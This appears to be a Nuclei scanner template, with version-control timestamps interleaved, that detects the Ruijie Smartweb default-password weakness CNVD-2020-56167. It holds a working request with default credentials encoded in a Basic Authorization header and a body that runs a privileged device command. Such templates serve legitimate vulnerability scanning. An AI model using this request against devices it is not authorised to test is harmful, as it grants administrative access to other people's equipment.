2021-06-03 16:24:08 +00:00
id : CNVD-2020-56167
2021-04-13 18:30:07 +00:00
info :
2022-10-10 19:22:59 +00:00
name : Ruijie Smartweb - Default Password
2021-04-13 18:30:07 +00:00
author : pikpikcu
severity : low
2022-10-10 19:22:59 +00:00
description : Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
2022-10-10 19:22:59 +00:00
- https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
2022-01-04 06:23:23 +00:00
tags : ruijie,default-login,cnvd,cnvd2020
2021-04-13 18:30:07 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
headers :
Authorization : Basic Z3Vlc3Q6Z3Vlc3Q=
body : command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition : and
matchers :
- type : word
2022-01-04 06:23:23 +00:00
part : body
2021-04-13 18:30:07 +00:00
words :
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
2021-04-13 19:29:14 +00:00
condition : and
2021-04-13 18:30:07 +00:00
- type : status
status :
- 200
2022-10-10 19:22:59 +00:00
# Enhanced by mp on 2022/09/30